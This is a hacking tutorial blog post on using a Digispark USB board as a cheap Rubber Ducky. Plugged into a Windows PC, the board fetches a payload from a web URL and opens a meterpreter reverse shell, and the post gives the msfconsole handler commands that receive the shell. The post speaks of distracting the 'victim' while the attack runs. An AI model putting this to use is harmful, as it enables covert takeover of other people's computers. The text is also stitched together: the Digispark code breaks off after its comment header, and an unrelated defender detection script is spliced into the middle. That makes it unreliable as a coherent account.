Reverse Shell for 1,50€ – Digispark instead of USB Rubber Ducky

Some of you might already have heard of it: the USB Rubber Ducky by Hak5. It is a very special USB device: not only a mass storage device, but any USB input device you want it to be. Because of this you can use it in some very nice ways to get your payload onto a victim's PC. The Rubber Ducky is freely programmable, so there are no limits on what you can do with it. The only problem is the high (but reasonable) price of $45. In this tutorial I will show you how you can use the Digispark USB Development Board as a cheap alternative. As an example we will be creating a reverse shell that will be launched when you plug the Digispark into a Windows PC.

You will need:

Digispark USB Development Board

The Digispark from Digistump is a tiny microcontroller that can be programmed with the Arduino IDE. The syntax is very similar to that of Arduino boards. A tutorial on how to set the IDE up for the Digispark can be found here: Connecting and Programming Your Digispark

For a nice video on setting the Digispark up, check out this tutorial by Seytonic (thanks to xxByte for sharing).

I bought a bunch of Digisparks off eBay for little money. They aren’t original (you can tell from the “rev3” which was never released) but they still are fully functional and perfect for our purposes.

Creating the Payload

First of all we need to create the payload that will be deployed and executed by the Digispark on our target machine. We will use MSFvenom for this.

You need to replace the LHOST parameter with your IP address. You could also use your domain and use the reverse shell even outside of your network.

Now… here we find the first difficulty. Unlike the Rubber Ducky, which can use an SD card of any size, the Digispark only has 6kb of internal memory, and the library we need in order to use the Digispark as a keyboard itself takes about 2,4kb. So there is no space to place the payload directly on it.
To get our payload onto the victim PC we need to make it accessible on the web. We could use a local web server, upload the plain payload to pastebin or just place it on our webspace nox-sec.de/hacking/payload.html

Programming The Digispark

After we’ve created the payload we can start programming the Digispark! Keep in mind that to program the Digispark you have to work with a US keyboard layout; this means you have to account for special characters and such if your own keyboard layout is a different one.

The source code for the Digispark:

Code for US keyboards

    #include "DigiKeyboard.h"
    /* US-KEYBOARD-LAYOUT ONLY!!
     *
     * still needs some testing... but should work
     *
     * Made by _N0x
     * Thanks to Alex (http://0xdeadcode.se/archives/581) for the idea of using a small powershell payload.

In principle you can leave the script unchanged and only change the URL for the payload, so that the payload you chose is downloaded. The Digispark should now be ready for use! Before you storm out and try to plug it into the next best USB port, though, you should prepare Kali Linux so that your reverse shell session can be accessed directly and as soon as needed.
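Seen from the defender's side, the behaviour this setup relies on (a newly attached USB keyboard, followed seconds later by a PowerShell process that fetches something from the web) can be correlated in endpoint logs. The following is an added example, not code from the original tutorial; the event types, field names and sample events are constructed assumptions to be mapped onto your own device-connection and process-creation telemetry.

```python
from datetime import datetime, timedelta

# Constructed sample events, not real telemetry. The event types and field
# names are assumptions; map them from your own device-connection and
# process-creation logs.
EVENTS = [
    {"ts": "2024-05-01T09:00:00", "host": "ws-01", "type": "hid_keyboard_added",
     "device": "generic USB keyboard"},
    {"ts": "2024-05-01T09:00:04", "host": "ws-01", "type": "process_start",
     "image": "powershell.exe", "cmdline": "powershell.exe <fetches http://example.invalid/stage>"},
    {"ts": "2024-05-01T09:00:05", "host": "ws-01", "type": "process_start",
     "image": "notepad.exe", "cmdline": "notepad.exe"},
    {"ts": "2024-05-01T10:15:00", "host": "ws-02", "type": "hid_keyboard_added",
     "device": "docking station keyboard"},
    {"ts": "2024-05-01T10:25:00", "host": "ws-02", "type": "process_start",
     "image": "powershell.exe", "cmdline": "powershell.exe -File inventory.ps1"},
    {"ts": "2024-05-01T11:00:00", "host": "ws-03", "type": "process_start",
     "image": "powershell.exe", "cmdline": "powershell.exe"},
]

SHELLS = {"powershell.exe", "pwsh.exe"}

def correlate(events, window_s=30):
    """Alert on a PowerShell start within window_s of a new HID keyboard on the same host."""
    last_kbd = {}  # host -> (arrival time, device name)
    alerts = []
    for ev in sorted(events, key=lambda e: e["ts"]):
        t = datetime.fromisoformat(ev["ts"])
        if ev["type"] == "hid_keyboard_added":
            last_kbd[ev["host"]] = (t, ev["device"])
        elif ev["type"] == "process_start" and ev["image"].lower() in SHELLS:
            seen = last_kbd.get(ev["host"])
            if seen and t - seen[0] <= timedelta(seconds=window_s):
                alerts.append({
                    "host": ev["host"],
                    "device": seen[1],
                    "delay_s": (t - seen[0]).total_seconds(),
                    # A URL on the command line raises confidence: the payload
                    # is fetched from the web rather than typed in full.
                    "fetches_url": "http" in ev["cmdline"].lower(),
                })
    return alerts

if __name__ == "__main__":
    for alert in correlate(EVENTS):
        print(alert)
```

The window is a tuning knob: a short value keeps docking stations and ordinary keyboard swaps from alerting, while a script that waits longer before typing needs a wider one.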

Preparing MSFconsole

To prepare the receiving-end for the Reverse-Shell, open a Terminal on your Kali Linux system and start MSFconsole by entering

    root@kali:~# msfconsole

Then specify what exploit you want to use:

    msf > use exploit/multi/handler

Now there are still some parameters we have to determine:

    msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
    payload => windows/meterpreter/reverse_tcp
    msf exploit(handler) > set LHOST 10.0.0.10
    LHOST => 10.0.0.10
    msf exploit(handler) > set LPORT 4444
    LPORT => 4444

Replace the value of LHOST with the IP/domain you used when creating the payload with MSFconsole.

To finish things off we have to tell our Console that it has to wait for a new session:

    msf exploit(handler) > exploit -z -j
    [*] Exploit running as background job.
    [*] Started reverse TCP handler on 10.0.0.10:4444
    [*] Starting the payload handler...

Now it’s done! You can search for the next best PC to test your Digispark out! After you plug your Digispark in, a PowerShell window will be opened and then closed; within this timeframe you have to distract your victim. Once your USB dev board starts to blink rapidly, you know your script has been executed and you can unplug the Digispark. If everything went as it should have, your console should display this: